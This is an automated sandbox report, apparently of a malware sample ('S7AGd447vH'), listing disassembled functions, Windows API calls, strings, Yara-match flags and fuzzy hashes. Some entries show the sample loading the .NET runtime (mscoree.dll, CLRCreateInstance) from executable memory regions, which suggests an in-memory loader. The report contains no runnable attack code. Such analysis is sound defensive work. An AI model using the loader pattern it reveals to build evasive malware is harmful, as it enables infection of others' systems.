                                                                                  • Instruction ID: 35e70594de3343cec193ed4b3efddcf5e0eaadd2cf146d92627de2791e1443f6
                                                                                  • Opcode Fuzzy Hash: 9b25b2480156a898975ff9207fa4a0d1f543927fad6c89e789778ca8823a3494
                                                                                  • Instruction Fuzzy Hash: E4F08230602228FBDB219B50DE09BDEBB75EB00755F550069E505E11A0DFB88E51DAD8
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00416295
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 004162A8
                                                                                  • _free.LIBCMT ref: 004162B9
                                                                                  • _free.LIBCMT ref: 004162CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: TZ
                                                                                  • API String ID: 776569668-2456141640
                                                                                  • Opcode ID: a9b7eeb1b825a360286587c7391533d25bf86073c3a630afaaf29fdc71c47209
                                                                                  • Instruction ID: 17f29831d95d5ca339852fbac288bb35cd082703f5dfb087a9833422e99e2c0c
                                                                                  • Opcode Fuzzy Hash: a9b7eeb1b825a360286587c7391533d25bf86073c3a630afaaf29fdc71c47209
                                                                                  • Instruction Fuzzy Hash: F6E04FF0415235AA8B516F12BE439853F31BB09706711616BF41002231C7F641D2AF8C
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004132C5), ref: 004133B5
                                                                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041340F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004132C5,?,000000FF,00000000,00000000), ref: 0041349D
                                                                                  • __dosmaperr.LIBCMT ref: 004134A4
                                                                                  • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004134E1
                                                                                    • Part of subcall function 00413709: __dosmaperr.LIBCMT ref: 0041373E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                  • String ID:
                                                                                  • API String ID: 1206951868-0
                                                                                  • Opcode ID: 9e75fcf97521c0e012578af4ab8d31cf15f6d097c0de31b8fbb2230b4899aa8c
                                                                                  • Instruction ID: 7a5675e70778044766161b9b0ab71a1d10fa057a0dc66ff984ad03481d502888
                                                                                  • Opcode Fuzzy Hash: 9e75fcf97521c0e012578af4ab8d31cf15f6d097c0de31b8fbb2230b4899aa8c
                                                                                  • Instruction Fuzzy Hash: D1416075900204AFCB25DFA5DC459EFBBF9EF89305B04482EF956D3610EB389A81CB24
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0041D26E
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D280
                                                                                  • _free.LIBCMT ref: 0041D292
                                                                                  • _free.LIBCMT ref: 0041D2A4
                                                                                  • _free.LIBCMT ref: 0041D2B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
                                                                                  • Instruction ID: 6d4f42ad6065432617f01940889ce0319a914ae83ddce40e5b72c6baea482f08
                                                                                  • Opcode Fuzzy Hash: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
                                                                                  • Instruction Fuzzy Hash: 6CF06272908304AB8634FB65E4CAC8777E9EA09310354085FF01DD7650C738FCC18AAC
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(mscoree.dll,00000000,02263E58,00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43525
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp$LibraryLoad
                                                                                  • String ID: mscoree.dll$v2.0.50727$v4.0.30319
                                                                                  • API String ID: 3438369058-518887049
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: d3d31f5be46057649fb9b99c077c88d5e31ad3076790e6f087b55fb3520f1749
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 26F0A972902325BFF71296657D41EFB75ACCB411D4F1021ADF901A2240D6B09E0076B5
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  • API String ID: 1646373207-3024904723
                                                                                  • Opcode ID: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction ID: 54fe31d5977995978b315a9fd433e02c4f518c0bef640df39cf22da13bcb4d8d
                                                                                  • Opcode Fuzzy Hash: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction Fuzzy Hash: E6E03039E0030AAFDB01CBA5CA0DF9DB6BDAF4526AB604159A805D6000E735D614EA10
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436C9,CorBindToRuntime), ref: 7FE43635
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CorBindToRuntime$v2.0.50727$wks
                                                                                  • API String ID: 190572456-3347351501
                                                                                  • Opcode ID: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction ID: 0c5fc14341107e3be1e4a3b148c5bf2aaf3a514f9beb35c349b5f130446ce887
                                                                                  • Opcode Fuzzy Hash: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction Fuzzy Hash: FCD02E32308323ABD6119E657C00FBABBA6AF402C0F00372DBE80EC124C341D035A38A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  • API String ID: 2221118986-1187780485
                                                                                  • Opcode ID: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction ID: 073b19536da68552c2ef516f0e74b594634c8d8f7233081d7479257ca9af4b1c
                                                                                  • Opcode Fuzzy Hash: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction Fuzzy Hash: D702F724C087C599DB168A78805D3EDBFF29F43228F9986CDC4D31BA97C27E6249D352
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$DbgUserBreakPoint
                                                                                  • API String ID: 2221118986-3284380563
                                                                                  • Opcode ID: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction ID: bbb4ff28fefea5246b1a415e85eba509f200322f977f728c9ce93df5bd6fac56
                                                                                  • Opcode Fuzzy Hash: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction Fuzzy Hash: 8F02F3148097C499DF138A68A0503FDBFF25F43228F28A68DE4E34B6E7C27D6249D356
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0042217E
                                                                                  • _free.LIBCMT ref: 004221A7
                                                                                  • SetEndOfFile.KERNEL32(00000000,0041E595,00000000,0041E82C,?,?,?,?,?,?,?,0041E595,0041E82C,00000000), ref: 004221D9
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041E595,0041E82C,00000000,?,?,?,?,00000000), ref: 004221F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1547350101-0
                                                                                  • Opcode ID: f105e4f7330317cfd069ab92d2c1c7aad1e63d6a5496295be2fccd10389ca4c9
                                                                                  • Instruction ID: 293562508d3b75ceed18384fa446975e2651337f910029f718001614b77a88c4
                                                                                  • Opcode Fuzzy Hash: f105e4f7330317cfd069ab92d2c1c7aad1e63d6a5496295be2fccd10389ca4c9
                                                                                  • Instruction Fuzzy Hash: 8A412832700611BBDB106FA9DD42FEE3775AF44324F54011BF628A72A1EABCC991876D
                                                                                  APIs
                                                                                    • Part of subcall function 004130D7: _free.LIBCMT ref: 004130E5
                                                                                    • Part of subcall function 0041C82B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00421C20,?,00000000,00000000), ref: 0041C8CD
                                                                                  • GetLastError.KERNEL32 ref: 0041B8BC
                                                                                  • __dosmaperr.LIBCMT ref: 0041B8C3
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B902
                                                                                  • __dosmaperr.LIBCMT ref: 0041B909
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                  • String ID:
                                                                                  • API String ID: 167067550-0
                                                                                  • Opcode ID: 2e3881f2e11957972756898f843b487a2f604e9d9679e774f7dbafeea38e4a0c
                                                                                  • Instruction ID: 095d4c43ec0daf9afac1e08a9d3b20872156a4b645d275253ab2c1db03167179
                                                                                  • Opcode Fuzzy Hash: 2e3881f2e11957972756898f843b487a2f604e9d9679e774f7dbafeea38e4a0c
                                                                                  • Instruction Fuzzy Hash: D721D8B1600205AF9B207F66CC819EBB79CEF00378710452AFA2997351D738DDC197D4
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,00413055,?,?,?,?,00413CC2,?), ref: 00417947
                                                                                  • _free.LIBCMT ref: 004179A4
                                                                                  • _free.LIBCMT ref: 004179DA
                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00413055,?,?,?,?,00413CC2,?), ref: 004179E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 2283115069-0
                                                                                  • Opcode ID: 15ae55d0fabae9737d6236069fb70904a2702244869e19290368a068439bb181
                                                                                  • Instruction ID: f44886405bcd11b52bc5f5453c8bd595cdc0622e60251feab63c3b55ae40c742
                                                                                  • Opcode Fuzzy Hash: 15ae55d0fabae9737d6236069fb70904a2702244869e19290368a068439bb181
                                                                                  • Instruction Fuzzy Hash: 5D11C67221C2416AA71127765CC6DEB29798BC1378B25023BF128962E1EE3D8CDA412D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,00413C5C,00417077,?,?,0041614E), ref: 00417A9E
                                                                                  • _free.LIBCMT ref: 00417AFB
                                                                                  • _free.LIBCMT ref: 00417B31
                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 00417B3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 2283115069-0
                                                                                  • Opcode ID: c380182e142c2e1c87376308911ac707daa6a03f36107a6266d6d900337f9e4f
                                                                                  • Instruction ID: 3ec2869ed4035905108020d6bb154c1a5af35f7ef893f3068d235d6d6968e62c
                                                                                  • Opcode Fuzzy Hash: c380182e142c2e1c87376308911ac707daa6a03f36107a6266d6d900337f9e4f
                                                                                  • Instruction Fuzzy Hash: FC11C63120C6017A971167769CC6DEF29B98BC13B8725023BF128861E1EE2D9CD6412C
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004182F1,00000000,?,0041EBE0,00000000,00000000,004182F1,?,?,00000000,00000000,00000001), ref: 0041820B
                                                                                  • GetLastError.KERNEL32(?,0041EBE0,00000000,00000000,004182F1,?,?,00000000,00000000,00000001,00000000,00000000,?,004182F1,00000000,00000104), ref: 00418215
                                                                                  • __dosmaperr.LIBCMT ref: 0041821C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2398240785-0
                                                                                  • Opcode ID: 4e38e9137bc5694164b1a41a536ff43004c579aa846234ace767dc9fd853d331
                                                                                  • Instruction ID: aac1492a34aeb4a7712834e58cbac2e5695d98ccf746a4b9b3de964524158273
                                                                                  • Opcode Fuzzy Hash: 4e38e9137bc5694164b1a41a536ff43004c579aa846234ace767dc9fd853d331
                                                                                  • Instruction Fuzzy Hash: A3F06232600515BB8B215FA2DC089DBFF69FF443A0314856AF518D7110DF35D8A2D7D4
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004182F1,00000000,?,0041EC55,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 004181A2
                                                                                  • GetLastError.KERNEL32(?,0041EC55,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,004182F1,00000000,00000104,?), ref: 004181AC
                                                                                  • __dosmaperr.LIBCMT ref: 004181B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2398240785-0
                                                                                  • Opcode ID: 279edd8d4ece87b1d3a8637269c62e89e05bb7f154ad503b0c6df0af7cc3e302
                                                                                  • Instruction ID: cbaf03c252dadb21657f22ac35acf13070849d1c927eb08493f9538ca41eeb8d
                                                                                  • Opcode Fuzzy Hash: 279edd8d4ece87b1d3a8637269c62e89e05bb7f154ad503b0c6df0af7cc3e302
                                                                                  • Instruction Fuzzy Hash: F4F04B32700115BB8A211BA2CC0889BFFA9FF453A0300852AF91D96520DF35E9A297D8
                                                                                  APIs
                                                                                  • WriteConsoleW.KERNEL32(00403FD0,00000000,0042F8A8,00000000,00403FD0,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0), ref: 004225EC
                                                                                  • GetLastError.KERNEL32(?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000,00403FD0,?,004197D0,00403FD0), ref: 004225F8
                                                                                    • Part of subcall function 004225BE: CloseHandle.KERNEL32(FFFFFFFE,00422608,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000,00403FD0), ref: 004225CE
                                                                                  • ___initconout.LIBCMT ref: 00422608
                                                                                    • Part of subcall function 00422580: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004225AF,0041FA0C,00403FD0,?,0041927C,00000000,?,00403FD0,00000000), ref: 00422593
                                                                                  • WriteConsoleW.KERNEL32(00403FD0,00000000,0042F8A8,00000000,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000), ref: 0042261D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                  • String ID:
                                                                                  • API String ID: 2744216297-0
                                                                                  • Opcode ID: 55b695b80b4adcc94f6d78668d328e8ccb605adb0f24a91616ec9c01678fe125
                                                                                  • Instruction ID: 269b5ab5e027013f0b97368f70e56529989ea90365c6b82d1693adf48919afa4
                                                                                  • Opcode Fuzzy Hash: 55b695b80b4adcc94f6d78668d328e8ccb605adb0f24a91616ec9c01678fe125
                                                                                  • Instruction Fuzzy Hash: 78F03036601124BBCF321FA1EC14E8E3F26FF087A4F854529FB1895130CA768860DB98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: <$PDu
                                                                                  • API String ID: 0-475385775
                                                                                  • Opcode ID: 12c6dc6ae46c2f0de1b8412df752af01c1dba0508c250d1472588638f7586fef
                                                                                  • Instruction ID: 9945669b60b7c6661290a091ce000a38be6731a15c1dc6d6bc78aa5e9493bb7a
                                                                                  • Opcode Fuzzy Hash: 12c6dc6ae46c2f0de1b8412df752af01c1dba0508c250d1472588638f7586fef
                                                                                  • Instruction Fuzzy Hash: 9D5178716143049BDB18AF38CA4979E7BE1AF89308F50562EFC45672C1CBB9C5848BCA
                                                                                  APIs
                                                                                    • Part of subcall function 0041C15E: GetOEMCP.KERNEL32(00000000,0041C3D0,?,?,00413CC2,00413CC2,?), ref: 0041C189
                                                                                  • _free.LIBCMT ref: 0041C42D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: P1Z
                                                                                  • API String ID: 269201875-3726526714
                                                                                  • Opcode ID: 254bf34c1be40f8779cd65d4814556e2b5b549f5670f27e9a3ac313cb2698e8b
                                                                                  • Instruction ID: 401053c1d18ecf400929803d4b8928ce90f3dcbf94a49c828f1befedf9997fa1
                                                                                  • Opcode Fuzzy Hash: 254bf34c1be40f8779cd65d4814556e2b5b549f5670f27e9a3ac313cb2698e8b
                                                                                  • Instruction Fuzzy Hash: 1731E132904209AFDB11DFA9DC81AEB7BF4EF44318F10406AF810972A1EB39DD80CB58
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: \.C$`.C
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436AF,CLRCreateInstance), ref: 7FE4359C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CLRCreateInstance$v4.0.30319
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00411236
                                                                                  • ___raise_securityfailure.LIBCMT ref: 0041131D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: $C
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(7FE453B0), ref: 009102B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708854930.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_910000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: v2.0.50727$v4.0.30319
                                                                                  APIs
